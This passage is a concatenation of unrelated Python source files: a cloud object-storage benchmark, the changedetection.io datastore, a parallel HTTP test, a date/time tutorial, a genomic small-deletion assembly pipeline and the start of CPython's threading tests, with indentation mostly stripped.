bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
else:
# Use a regular bucket
service.MakeBucket(
bucket_name, raise_on_failure=raise_on_bucket_creation_failure)
# Save the service and the bucket name for later
benchmark_spec.service = service
benchmark_spec.bucket_name = bucket_name
def Run(benchmark_spec):
"""Run storage benchmark and publish results.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
A list of sample.Sample objects containing the benchmark results.
"""
logging.info('Start benchmarking object storage service, '
'scenario is %s, storage provider is %s.',
FLAGS.object_storage_scenario, FLAGS.storage)
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
metadata = {'storage_provider': FLAGS.storage}
vms = benchmark_spec.vms
if FLAGS[OBJECT_STORAGE_REGION].present:
metadata[REGIONAL_BUCKET_LOCATION] = FLAGS.object_storage_region
else:
metadata[REGIONAL_BUCKET_LOCATION] = DEFAULT
if FLAGS[OBJECT_STORAGE_GCS_MULTIREGION].present:
metadata[GCS_MULTIREGION_LOCATION] = FLAGS.object_storage_gcs_multiregion
else:
metadata[GCS_MULTIREGION_LOCATION] = DEFAULT
metadata.update(service.Metadata(vms[0]))
results = []
test_script_path = '/tmp/run/%s' % API_TEST_SCRIPT
try:
command_builder = APIScriptCommandBuilder(
test_script_path, STORAGE_TO_API_SCRIPT_DICT[FLAGS.storage], service)
except KeyError:
command_builder = UnsupportedProviderCommandBuilder(FLAGS.storage)
for name, benchmark in [('cli', CLIThroughputBenchmark),
('api_data', OneByteRWBenchmark),
('api_data', SingleStreamThroughputBenchmark),
('api_namespace', ListConsistencyBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms[0], command_builder,
service, bucket_name)
# MultiStreamRW and MultiStreamWrite support multiple VMs, so they have a
# slightly different calling convention than the others.
for name, benchmark in [('api_multistream', MultiStreamRWBenchmark),
('api_multistream_writes',
MultiStreamWriteBenchmark)]:
if FLAGS.object_storage_scenario in {name, 'all'}:
benchmark(results, metadata, vms, command_builder, service, bucket_name)
# MultiStreamRead has the additional 'read_objects' parameter
if FLAGS.object_storage_scenario in {'api_multistream_reads', 'all'}:
metadata['cold_objects_filename'] = benchmark_spec.read_objects_filename
metadata['cold_objects_age_hours'] = benchmark_spec.read_objects_age_hours
MultiStreamReadBenchmark(results, metadata, vms, command_builder, service,
bucket_name,
benchmark_spec.read_objects['objects_written'])
# Clear the bucket if we're not saving the objects for later
# This is needed for long running tests, or else the objects would just pile
# up after each run.
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
MultiStreamDelete(results, metadata, vms, command_builder, service,
bucket_name)
service.UpdateSampleMetadata(results)
return results
def Cleanup(benchmark_spec):
"""Clean up storage bucket/container and clean up vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
if not hasattr(benchmark_spec, 'service'):
logging.info('Skipping cleanup as prepare method failed')
return
service = benchmark_spec.service
bucket_name = benchmark_spec.bucket_name
vms = benchmark_spec.vms
vm_util.RunThreaded(lambda vm: CleanupVM(vm, service), vms)
# Only clean up bucket if we're not saving the objects for a later run
keep_bucket = (FLAGS.object_storage_objects_written_file_prefix is not None or
FLAGS.object_storage_dont_delete_bucket)
if not keep_bucket:
service.DeleteBucket(bucket_name)
service.CleanupService()
store.py
from os import unlink, path, mkdir
import json
import uuid as uuid_builder
from threading import Lock
from copy import deepcopy
import logging
import time
import threading
import os
from changedetectionio.notification import default_notification_format, default_notification_body, default_notification_title
# Is there an existing library to ensure some data store (JSON etc) is in sync with CRUD methods?
# Open a github issue if you know something :)
# https://stackoverflow.com/questions/6190468/how-to-trigger-function-on-value-change
class ChangeDetectionStore:
lock = Lock()
def __init__(self, datastore_path="/datastore", include_default_watches=True, version_tag="0.0.0"):
# Should only be active for docker
# logging.basicConfig(filename='/dev/stdout', level=logging.INFO)
self.needs_write = False
self.datastore_path = datastore_path
self.json_store_path = "{}/url-watches.json".format(self.datastore_path)
self.stop_thread = False
self.__data = {
'note': "Hello! If you change this file manually, please be sure to restart your changedetection.io instance!",
'watching': {},
'settings': {
'headers': {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate', # No support for brotli in python requests yet.
'Accept-Language': 'en-GB,en-US;q=0.9,en;'
},
'requests': {
'timeout': 15, # Default 15 seconds
'minutes_between_check': 3 * 60, # Default 3 hours
'workers': 10 # Number of threads, lower is better for slow connections
},
'application': {
'password': False,
'base_url' : None,
'extract_title_as_title': False,
'fetch_backend': 'html_requests',
'notification_urls': [], # Apprise URL list
# Custom notification content
'notification_title': None,
'notification_body': None,
'notification_format': None
}
}
}
# Base definition for all watchers
self.generic_definition = {
'url': None,
'tag': None,
'last_checked': 0,
'last_changed': 0,
'paused': False,
'last_viewed': 0, # history key (timestamp) of the snapshot last viewed via the [diff] link
'newest_history_key': "",
'title': None,
# Re #110, so then if this is set to None, we know to use the default value instead
# Requires setting to None on submit if it's the same as the default
'minutes_between_check': None,
'previous_md5': "",
'uuid': str(uuid_builder.uuid4()),
'headers': {}, # Extra headers to send
'body': None,
'method': 'GET',
'history': {}, # Dict of timestamp and output stripped filename
'ignore_text': [], # List of text to ignore when calculating the comparison checksum
# Custom notification content
'notification_urls': [], # List of URLs to add to the notification Queue (Usually AppRise)
'notification_title': None,
'notification_body': None,
'notification_format': None,
'css_filter': "",
'trigger_text': [], # List of text or regex to wait for until a change is detected
'fetch_backend': None,
'extract_title_as_title': False
}
if path.isfile('changedetectionio/source.txt'):
with open('changedetectionio/source.txt') as f:
# Should be set in Dockerfile to look for /source.txt , this will give us the git commit #
# So when someone gives us a backup file to examine, we know exactly what code they were running.
self.__data['build_sha'] = f.read()
try:
# @todo retest with ", encoding='utf-8'"
with open(self.json_store_path) as json_file:
from_disk = json.load(json_file)
# @todo isn't there a way to do this dict.update recursively?
# Problem here is that if the copy on disk is missing a sub-struct, it won't be present anymore.
if 'watching' in from_disk:
self.__data['watching'].update(from_disk['watching'])
if 'app_guid' in from_disk:
self.__data['app_guid'] = from_disk['app_guid']
if 'settings' in from_disk:
if 'headers' in from_disk['settings']:
self.__data['settings']['headers'].update(from_disk['settings']['headers'])
if 'requests' in from_disk['settings']:
self.__data['settings']['requests'].update(from_disk['settings']['requests'])
if 'application' in from_disk['settings']:
self.__data['settings']['application'].update(from_disk['settings']['application'])
# Reinitialise each `watching` entry with our generic_definition, in case we add a new var in the future.
# @todo pretty sure there's a more Pythonic way to do this with an abstracted(?) object!
for uuid, watch in self.__data['watching'].items():
_blank = deepcopy(self.generic_definition)
_blank.update(watch)
self.__data['watching'].update({uuid: _blank})
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
print("Watching:", uuid, self.__data['watching'][uuid]['url'])
# First time run, doesn't exist yet.
except (FileNotFoundError, json.decoder.JSONDecodeError):
if include_default_watches:
print("Creating JSON store at", self.datastore_path)
self.add_watch(url='https://www.uk.emb-japan.go.jp/itpr_en/visa-cert-top.html', tag='UK')
self.add_watch(url='https://www.fr.emb-japan.go.jp/itpr_fr/visas-demarches.html', tag='Paris')
self.add_watch(url='https://www.fr.emb-japan.go.jp/itpr_fr/restrictionsdentree2021.html', tag='Paris')
self.add_watch(url='https://www.lyon.fr.emb-japan.go.jp/itpr_fr/info_visa.html', tag='Lyon')
self.__data['version_tag'] = version_tag
# Helper to remove password protection
password_reset_lockfile = "{}/removepassword.lock".format(self.datastore_path)
if path.isfile(password_reset_lockfile):
self.__data['settings']['application']['password'] = False
unlink(password_reset_lockfile)
if not 'app_guid' in self.__data:
import sys
import os
if "pytest" in sys.modules or "PYTEST_CURRENT_TEST" in os.environ:
self.__data['app_guid'] = "test-" + str(uuid_builder.uuid4())
else:
self.__data['app_guid'] = str(uuid_builder.uuid4())
# Generate the URL access token for RSS feeds
if not 'rss_access_token' in self.__data['settings']['application']:
import secrets
secret = secrets.token_hex(16)
self.__data['settings']['application']['rss_access_token'] = secret
self.needs_write = True
# Finally start the thread that will manage periodic data saves to JSON
save_data_thread = threading.Thread(target=self.save_datastore)
save_data_thread.start()
# Returns the newest key, but if there's only 1 record it's counted as not being new, so return 0.
def get_newest_history_key(self, uuid):
if len(self.__data['watching'][uuid]['history']) == 1:
return 0
dates = list(self.__data['watching'][uuid]['history'].keys())
# Convert to int, sort and back to str again
# @todo replace datastore getter that does this automatically
dates = [int(i) for i in dates]
dates.sort(reverse=True)
if len(dates):
# always keyed as str
return str(dates[0])
return 0
def set_last_viewed(self, uuid, timestamp):
self.data['watching'][uuid].update({'last_viewed': int(timestamp)})
self.needs_write = True
def update_watch(self, uuid, update_obj):
# Skip if 'paused' state
if self.__data['watching'][uuid]['paused']:
return
with self.lock:
# In Python 3.9 we have the |= dict operator, but that would still lose data on nested structures...
for dict_key, d in self.generic_definition.items():
if isinstance(d, dict):
if update_obj is not None and dict_key in update_obj:
self.__data['watching'][uuid][dict_key].update(update_obj[dict_key])
del (update_obj[dict_key])
self.__data['watching'][uuid].update(update_obj)
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
self.needs_write = True
@property
def data(self):
has_unviewed = False
for uuid, v in self.__data['watching'].items():
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
if int(v['newest_history_key']) <= int(v['last_viewed']):
self.__data['watching'][uuid]['viewed'] = True
else:
self.__data['watching'][uuid]['viewed'] = False
has_unviewed = True
# #106 - Be sure this is None on empty string, False, None, etc
# Default var for fetch_backend
if not self.__data['watching'][uuid]['fetch_backend']:
self.__data['watching'][uuid]['fetch_backend'] = self.__data['settings']['application']['fetch_backend']
# Re #152, return env base_url if not overridden, @todo also prefer the proxy pass URL
env_base_url = os.getenv('BASE_URL','')
if not self.__data['settings']['application']['base_url']:
self.__data['settings']['application']['base_url'] = env_base_url.strip('" ')
self.__data['has_unviewed'] = has_unviewed
return self.__data
def get_all_tags(self):
tags = []
for uuid, watch in self.data['watching'].items():
# Support for a comma-separated list of tags.
for tag in watch['tag'].split(','):
tag = tag.strip()
if tag not in tags:
tags.append(tag)
tags.sort()
return tags
def unlink_history_file(self, path):
try:
unlink(path)
except (FileNotFoundError, IOError):
pass
# Delete a single watch by UUID
def delete(self, uuid):
with self.lock:
if uuid == 'all':
# GitHub #30 also delete history records (before clearing the index, or they would be orphaned)
for watch_uuid in self.data['watching']:
for path in self.data['watching'][watch_uuid]['history'].values():
self.unlink_history_file(path)
self.__data['watching'] = {}
else:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
del self.data['watching'][uuid]
self.needs_write = True
# Clone a watch by UUID
def clone(self, uuid):
url = self.data['watching'][uuid]['url']
tag = self.data['watching'][uuid]['tag']
extras = self.data['watching'][uuid]
new_uuid = self.add_watch(url=url, tag=tag, extras=extras)
return new_uuid
def url_exists(self, url):
# There should probably be a dict for this...
for watch in self.data['watching'].values():
if watch['url'] == url:
return True
return False
def get_val(self, uuid, val):
# There should probably be a dict for this...
return self.data['watching'][uuid].get(val)
# Remove a watch's data but keep the entry (URL etc)
def scrub_watch(self, uuid, limit_timestamp = False):
import hashlib
del_timestamps = []
changes_removed = 0
for timestamp, path in self.data['watching'][uuid]['history'].items():
if not limit_timestamp or (limit_timestamp is not False and int(timestamp) > limit_timestamp):
self.unlink_history_file(path)
del_timestamps.append(timestamp)
changes_removed += 1
if not limit_timestamp:
self.data['watching'][uuid]['last_checked'] = 0
self.data['watching'][uuid]['last_changed'] = 0
self.data['watching'][uuid]['previous_md5'] = 0
for timestamp in del_timestamps:
del self.data['watching'][uuid]['history'][str(timestamp)]
# If there was a limit timestamp, we need to reset some metadata about the entry
# This has to happen after we remove the others from the list
if limit_timestamp:
newest_key = self.get_newest_history_key(uuid)
if newest_key:
self.data['watching'][uuid]['last_checked'] = int(newest_key)
# @todo should be the original value if it was less than newest key
self.data['watching'][uuid]['last_changed'] = int(newest_key)
try:
with open(self.data['watching'][uuid]['history'][str(newest_key)], "rb") as fp:
content = fp.read()
self.data['watching'][uuid]['previous_md5'] = hashlib.md5(content).hexdigest()
except (FileNotFoundError, IOError):
self.data['watching'][uuid]['previous_md5'] = False
self.needs_write = True
return changes_removed
def add_watch(self, url, tag, extras=None):
if extras is None:
extras = {}
with self.lock:
# @todo use a common generic version of this
new_uuid = str(uuid_builder.uuid4())
_blank = deepcopy(self.generic_definition)
_blank.update({
'url': url,
'tag': tag
})
# In case these are copied across, assume it's a reference and deepcopy()
apply_extras = deepcopy(extras)
for k in ['uuid', 'history', 'last_checked', 'last_changed', 'newest_history_key', 'previous_md5', 'viewed']:
if k in apply_extras:
del apply_extras[k]
_blank.update(apply_extras)
self.data['watching'][new_uuid] = _blank
# Get the directory ready
output_path = "{}/{}".format(self.datastore_path, new_uuid)
try:
mkdir(output_path)
except FileExistsError:
print(output_path, "already exists.")
self.sync_to_json()
return new_uuid
# Save some text file to the appropriate path and bump the history
# result_obj from fetch_site_status.run()
def save_history_text(self, watch_uuid, contents):
import uuid
output_path = "{}/{}".format(self.datastore_path, watch_uuid)
fname = "{}/{}.stripped.txt".format(output_path, uuid.uuid4())
with open(fname, 'wb') as f:
f.write(contents)
return fname
def sync_to_json(self):
logging.info("Saving JSON..")
try:
data = deepcopy(self.__data)
except RuntimeError as e:
# Try again in 15 seconds
time.sleep(15)
logging.error("! Data changed while writing to JSON, trying again.. %s", str(e))
self.sync_to_json()
return
else:
try:
# Re #286 - First write to a temp file, then confirm it looks OK and rename it.
# This is a fairly basic strategy to avoid ending up with a corrupted file if the
# write is interrupted, the system runs out of memory or disk space, etc.
with open(self.json_store_path+".tmp", 'w') as json_file:
json.dump(data, json_file, indent=4)
except Exception as e:
logging.error("Error writing JSON!! (Main JSON file save was skipped) : %s", str(e))
else:
os.rename(self.json_store_path+".tmp", self.json_store_path)
self.needs_write = False
# Thread runner, this helps with thread/write issues when there are many operations that want to update the JSON
# by just running periodically in one thread; in CPython, individual dict updates are thread-safe.
def save_datastore(self):
while True:
if self.stop_thread:
print("Shutting down datastore thread")
return
if self.needs_write:
self.sync_to_json()
# Once per minute is enough; saving more often can cause high CPU usage.
# Better would be something like self.app.config.exit.wait(1), but we can't get to 'app' from here.
for i in range(30):
time.sleep(2)
if self.stop_thread:
break
# Go through the datastore path and remove any snapshots that are not mentioned in the index
# This usually is not used, but can be handy.
def remove_unused_snapshots(self):
print ("Removing snapshots from datastore that are not in the index..")
index=[]
for uuid in self.data['watching']:
for id in self.data['watching'][uuid]['history']:
index.append(self.data['watching'][uuid]['history'][str(id)])
import pathlib
# Only in the sub-directories
for item in pathlib.Path(self.datastore_path).rglob("*/*txt"):
if not str(item) in index:
print ("Removing",item)
unlink(item)
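# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged example of driving the datastore defined above; the path,
# URL and tag below are made up for illustration, and the demo only runs when
# this file is executed directly.
if __name__ == '__main__':
    demo_path = '/tmp/changedetection-demo'
    os.makedirs(demo_path, exist_ok=True)  # add_watch()/sync_to_json() expect the datastore dir to exist
    demo_store = ChangeDetectionStore(datastore_path=demo_path,
                                      include_default_watches=False)
    demo_uuid = demo_store.add_watch(url='https://example.com', tag='demo')
    print("Added watch", demo_uuid, "->", demo_store.get_val(demo_uuid, 'url'))
    demo_store.stop_thread = True  # let the periodic save thread exit cleanly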
|
parallelhttp.py
|
import requests
from testsbase import testsbase
import threading
from queue import Queue
from time import sleep, time
class parallelhttp(testsbase):
def __init__(self, config):
super().__init__(config)
self.q = Queue()
def run(self, vh=None):
test_list = [self.test1, self.test2]
return super().run(tests=test_list, vh=vh, testfile='index.html')
def worker(self):
try:
response = requests.get(self.url)
self.q.put((response.status_code == 200) and (self.check_byhash(response)))
except Exception as err:
print(err)
# Still put a result on the queue so parallel_clients() does not block on q.get()
self.q.put(False)
def parallel_clients(self, number_of_threads):
threads = []
for i in range(number_of_threads):
t = threading.Thread(target=self.worker)
threads.append(t)
t.start()
for t in threads:
t.join()
results = [self.q.get() for _ in range(number_of_threads)]
return all(results) and (len(results) == number_of_threads)
def test1(self):
""" 100 connections"""
start = time()
r = self.parallel_clients(100)
return r and (time() - start < 1)
def test2(self):
""" 500 connections """
start = time()
r = self.parallel_clients(500)
return r and (time() - start < 10)
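# --- Illustrative standalone sketch (not part of the original test class) ---
# The same fan-out pattern as parallel_clients(), shown without the check_byhash()
# step; the URL, thread count and timeout are assumptions made up for illustration,
# and running this file directly still requires the testsbase module imported above.
if __name__ == '__main__':
    demo_queue = Queue()

    def demo_worker(url):
        try:
            demo_queue.put(requests.get(url, timeout=5).status_code == 200)
        except Exception as err:
            print(err)
            demo_queue.put(False)  # always report a result so the collector never blocks

    demo_threads = [threading.Thread(target=demo_worker, args=('https://example.com',))
                    for _ in range(10)]
    for t in demo_threads:
        t.start()
    for t in demo_threads:
        t.join()
    print("all OK:", all(demo_queue.get() for _ in demo_threads))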
|
python_os_and_time.py
|
def write_date():
import time
now = time.time()
time_str = time.ctime(now)
with open('save_time.txt', 'wt') as fout:
print(time_str, file=fout)
def list_dir():
import os
print("Files in the current directory: ", os.listdir('.'),
"\nFiles in the parent directory: ", os.listdir('../'))
os.chdir('../')
print("Files in the parent directory: ", os.listdir('./'))
def do_this():
import os
import random
import time
t = random.randint(1,5)
print("Wait %s seconds, process %s " % (t,os.getpid()))
time.sleep(t)
now = time.time()
print("Process %s End time: %s " % (os.getpid(),time.ctime(now)))
def use_process():
import multiprocessing
for n in range(3):
p = multiprocessing.Process(target=do_this)
p.start()
def use_date():
from datetime import date
birthday = date(2003,6,7)
fmt = "%A"
week = birthday.strftime(fmt)
from datetime import timedelta
one_day = timedelta(days = 1)
the_other_day = one_day * 10000 + birthday
print("生日: ", birthday, \
"\n生日是星期: ",week,\
"\n出生后1万天的日期是: ",the_other_day)
def use_str_date():
import time
date_str = 'Fri Jul 26 12:36:27 2019'
fmt = "%a %b %d %H:%M:%S %Y"
time1 = time.strptime(date_str, fmt)
time2 = time.mktime(time1)
time3 = time.ctime(time2)
print("Parsed time: ", time1,
"\nEpoch value: ", time2,
"\nConverted back to a string: ", time3)
if __name__ == '__main__':
# write_date()
# list_dir()
# use_process()
# use_date()
use_str_date()
|
local_assembly.py
|
#!/usr/bin/env python
import os
import sys
import time
import multiprocessing
try:
from scripts import my_utils
except ImportError:
import my_utils
tab = '\t'
endl = '\n'
arg = sys.argv[1:]
usage = 'python ' + __file__ + ' ' + '<input_bam_file> <out_dir> <out_del_call_file> <n_threads> <ref_fasta> <fermikit_dir> <samtools> <bedtools> '
argc = 0
for i in range(0, len(usage)):
if usage[i] == '<':
argc += 1
class Interval:
def __init__(self, chrom, start_pos, end_pos):
self.chrom = chrom
self.start_pos = int(start_pos)
self.end_pos = int(end_pos)
self.out_dir = ''
self.shell_file = ''
self.shell_cmds = ''
self.region_bed_file = ''
def main():
if len(arg) < argc:
print (usage)
sys.exit()
input_bam_file = os.path.abspath(arg.pop(0))
out_dir = os.path.abspath(arg.pop(0))
out_del_call_file = arg.pop(0)
n_threads = int(arg.pop(0))
ref_fasta_file = os.path.abspath(arg.pop(0))
fermikit_dir = os.path.abspath(arg.pop(0))
samtools = os.path.abspath(arg.pop(0))
bedtools = os.path.abspath(arg.pop(0))
window_size = int(2e5)
faidx_file = ref_fasta_file + '.fai'
max_depth = 500
small_deletion_detection_by_local_assembly(samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, faidx_file, out_dir, out_del_call_file, n_threads, window_size, max_depth)
return
def small_deletion_detection_by_local_assembly(samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, faidx_file, out_dir, out_del_call_file, n_threads, window_size, max_depth, rm_temp_files = 1):
if os.path.exists(faidx_file) == False:
cmd = '%s faidx %s' % (samtools, ref_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
if os.path.exists(faidx_file) == False:
my_utils.myprint ('ERROR! The index file of the reference fasta file does not exist!' )
sys.exit()
cmd = 'mkdir -p %s' % out_dir
my_utils.myprint(cmd)
os.system('mkdir -p %s' % out_dir)
tid2chrname_list, chrname2tid_dict = my_utils.get_chrnames(faidx_file)
chr_len_list = my_utils.get_chr_length(faidx_file)
overlap_length = int(window_size/10)
interval_list = generate_interval_list(chr_len_list, tid2chrname_list, chrname2tid_dict, window_size, overlap_length)
process_list = list()
out_combined_vcf_file_list = list()
for i in range(0, n_threads):
out_combined_vcf_file = os.path.join(out_dir, 'assembly_raw_variants.%d.txt' % i)
out_combined_vcf_file_list.append(out_combined_vcf_file)
t = multiprocessing.Process(target=small_deletion_detection_from_interval_list, args=(i, n_threads, samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, out_dir, window_size, max_depth, interval_list, out_combined_vcf_file))
process_list.append(t)
t.start()
for t in process_list:
t.join()
all_processes_out_combined_vcf_file = os.path.join(out_dir, 'local_assembly_raw_variants.txt')
cmd = 'cat '
for out_combined_vcf_file in out_combined_vcf_file_list:
cmd += ' %s ' % out_combined_vcf_file
cmd += ' > %s ' % all_processes_out_combined_vcf_file
my_utils.myprint(cmd)
os.system(cmd)
extract_del_from_vcf_file(all_processes_out_combined_vcf_file, out_del_call_file)
if rm_temp_files:
for out_combined_vcf_file in out_combined_vcf_file_list:
os.remove(out_combined_vcf_file)
os.remove(all_processes_out_combined_vcf_file)
return
def small_deletion_detection_from_interval_list(thread_id, n_threads, samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, out_dir, window_size, max_depth, interval_list, out_combined_vcf_file):
out_combined_vcf_fp = open(out_combined_vcf_file, 'w')
out_combined_vcf_fp.write('')
out_combined_vcf_fp.close()
for region_id in range(0, len(interval_list)):
if region_id % n_threads != thread_id: continue
itv = interval_list[region_id]
process1region(samtools, bedtools, fermikit_dir, ref_fasta_file, input_bam_file, out_dir, itv, region_id, window_size, max_depth, 1, out_combined_vcf_file)
return
def process1region(samtools, bedtools, fermikit_dir, ref_fasta_file, input_bam_file, out_dir, itv, region_id, window_size, max_depth, n_threads_for_one_process, out_combined_vcf_file):
curr_out_dir = os.path.join(out_dir, 'region_%06d' % (region_id))
out_bam_file = os.path.join(curr_out_dir, 'region_%06d.bam' % region_id)
out_all_fastq_file = os.path.join(curr_out_dir, 'region_%06d.all.fastq' % region_id)
region_bed_file = os.path.join(curr_out_dir, 'region_%06d.bed' % region_id)
region_fasta_file = os.path.join(curr_out_dir, 'region_%06d.fasta' % region_id)
interval = '%s:%d-%d' % (itv.chrom, itv.start_pos+1, itv.end_pos)
cmd = 'mkdir -p %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
time.sleep(0.05)
if os.path.exists(curr_out_dir) == False:
os.system(cmd)
time.sleep(1)
if os.path.exists(curr_out_dir) == False:
my_utils.myprint('Failed to create directory: %s' % curr_out_dir)
cmd = 'rm -rf %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
return
cmd = extract_bam_region(samtools, input_bam_file, interval, out_bam_file, n_threads_for_one_process)
my_utils.myprint(cmd)
os.system(cmd)
cmd = index_bam(samtools, out_bam_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = bam_to_1fastq(samtools, out_bam_file, out_all_fastq_file)
my_utils.myprint(cmd)
os.system(cmd)
fastq_file_size = os.path.getsize(out_all_fastq_file)
if fastq_file_size > window_size * max_depth * 2 or fastq_file_size < 20000:
cmd = 'rm -r %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
return
region_bed_fp = open(region_bed_file, 'w')
region_bed_fp.write('%s\t%d\t%d\n' % (itv.chrom, itv.start_pos, itv.end_pos))
region_bed_fp.close()
cmd = extract_ref_region(bedtools, ref_fasta_file, region_bed_file, region_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
out_prefix = os.path.join(curr_out_dir, 'region_%06d.all_hap' % region_id)
fermikit_variant_calling(fermikit_dir, samtools, n_threads_for_one_process, region_fasta_file, window_size, out_all_fastq_file, curr_out_dir, out_prefix)
indel_call_file = out_prefix + '.flt.vcf'
sv_call_file = out_prefix + '.sv.vcf'
cmd = 'gunzip --force %s.gz' % indel_call_file
os.system(cmd)
cmd = 'gunzip --force %s.gz' % sv_call_file
os.system(cmd)
cmd = 'cat %s %s >> %s' % (indel_call_file, sv_call_file, out_combined_vcf_file)
os.system(cmd)
cmd = 'rm -r %s' % curr_out_dir
os.system(cmd)
return
def fermikit_variant_calling(fermikit_dir, samtools, n_threads_for_one_process, region_fasta_file, window_size, input_fastq_file, curr_out_dir, out_prefix):
out_mak_file = os.path.join(curr_out_dir, '%s.mak' % out_prefix)
assembly_contigs_file = os.path.join(curr_out_dir, '%s.mag.gz' % out_prefix)
cmd = 'cd %s && %s/bwa index %s' % (curr_out_dir, fermikit_dir, region_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'cd %s && perl %s/fermi2.pl unitig -s %s -l 151 -t %d -p %s %s > %s\n\n' % (curr_out_dir, fermikit_dir, window_size, n_threads_for_one_process, out_prefix, input_fastq_file, out_mak_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'make -f %s\n\n' % out_mak_file
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'cd %s && perl %s/run-calling -t %d %s %s | sh \n\n' % (curr_out_dir, fermikit_dir, n_threads_for_one_process, region_fasta_file, assembly_contigs_file)
my_utils.myprint(cmd)
os.system(cmd)
return
def extract_bam_region(samtools, input_bam, interval, output_bam, n_threads_for_one_process):
cmd = 'time %s view -1 -hb -@ %d %s %s > %s' % (samtools, n_threads_for_one_process, input_bam, interval, output_bam)
return cmd
def index_bam(samtools, input_bam):
cmd = 'time %s index %s' % (samtools, input_bam)
return cmd
def bam_to_1fastq(samtools, input_bam, out_fastq):
cmd = 'time %s fastq %s > %s' % (samtools, input_bam, out_fastq)
return cmd
def split_bam_by_hap_type(split_hap_type_bam, in_bam_file, out_hap0_bam_file, out_hap1_bam_file, out_hap2_bam_file, out_unmapped_bam_file):
cmd = 'time %s %s %s %s %s %s ' % (split_hap_type_bam, in_bam_file, out_hap0_bam_file, out_hap1_bam_file, out_hap2_bam_file, out_unmapped_bam_file)
return cmd
def extract_ref_region(bedtools, ref_fasta_file, bed_file, out_fasta_file):
cmd = '%s getfasta -fi %s -bed %s -fo %s' % (bedtools, ref_fasta_file, bed_file, out_fasta_file )
return cmd
def generate_interval_list(chr_len_list, tid2chrname_list, chrname2tid_dict, window_size, overlap_length):
interval_list = list()
step_length = window_size - overlap_length
for tid in range(0, len(chr_len_list)):
chrom = tid2chrname_list[tid]
chr_len = chr_len_list[tid]
for start_pos in range(0, chr_len, step_length):
end_pos = start_pos + window_size
if end_pos > chr_len:
end_pos = chr_len
break
itv = Interval(chrom, start_pos, end_pos)
interval_list.append(itv)
if end_pos == chr_len:
break
return interval_list
def extract_del_from_vcf_file(in_vcf_file, out_file):
in_vcf_fp = open(in_vcf_file, 'r')
out_fp = open(out_file, 'w')
min_del_size = 50
id = 0
while 1:
line = in_vcf_fp.readline().strip()
if not line: break
if line[0] == '#' : continue
items = line.split('\t')
chrom1 = items[0]
try:
pos1 = int(items[1])
except (ValueError, IndexError):
my_utils.myprint('ERROR! invalid VCF record: %s' % line)
continue
ref_allele = items[3]
alt_allele = items[4]
flt = items[6]
info = items[7]
sv_type = ''
sv_size = 0
pos2 = -1
if '[' in alt_allele or ']' in alt_allele: continue
ref_chr, ref_start_end = chrom1.split(':')
ref_start, ref_end = ref_start_end.split('-')
ref_start = int(ref_start)
chrom1 = ref_chr
pos1 += ref_start
if len(ref_allele) > min_del_size and len(ref_allele) - len(alt_allele) > min_del_size:
sv_type = 'DEL'
sv_size = len(ref_allele) - len(alt_allele)
pos2 = pos1 + sv_size
else:
for ele in info.split(';'):
key = ele.split('=')[0]
if key == 'SVTYPE':
sv_type = ele.split('=')[1]
elif key == 'SVLEN':
sv_size = abs(int(ele.split('=')[1]))
elif key == 'END' and pos2 == -1:
pos2 = int(ele.split('=')[1]) + ref_start
if sv_type != 'DEL': continue
chrom2 = chrom1
flt = 'PASS'
score = 30
sv_id = '.'
out_item = '%s\t%d\t%d\t%s\t%d\t%d\t' % (chrom1, pos1, pos1+1, chrom2, pos2, pos2+1)
out_item += '%s\t%s\t%d\t%d\t%s\tSVMETHOD=local_assembly\n' % (sv_type, sv_id, sv_size, score, flt)
out_fp.write(out_item)
in_vcf_fp.close()
out_fp.close()
return
if __name__ == '__main__':
main()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
